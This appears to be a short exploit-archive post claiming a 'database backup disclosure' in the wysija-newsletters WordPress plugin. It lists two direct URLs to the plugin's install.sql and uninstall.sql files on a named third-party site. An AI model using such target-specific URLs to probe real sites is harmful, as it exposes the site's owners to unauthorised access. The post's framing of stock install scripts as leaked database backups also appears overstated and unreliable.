#################################################################################################

# Exploit Title : (DMC.com.eg) Database Backup Disclosure
# Author [ Discovered By ] : Elsfa7-110
# Date : 22/05/2020
# Vendor Homepage : mailpoet.com ~ wordpress.org/plugins/wysija-newsletters/
# Software Download Link : downloads.wordpress.org/plugin/wysija-newsletters.2.10.2.zip
# Tested On : Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 – [ Permissions, Privileges, and Access Controls ]
CWE-23 – [ Relative Path Traversal ] – CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

# Exploit :

https://dmc.com.eg/wp-content/plugins/wysija-newsletters/sql/install.sql

https://dmc.com.eg/wp-content/plugins/wysija-newsletters/sql/uninstall.sql

############################################################################################





Source link

You must be logged in to post a comment.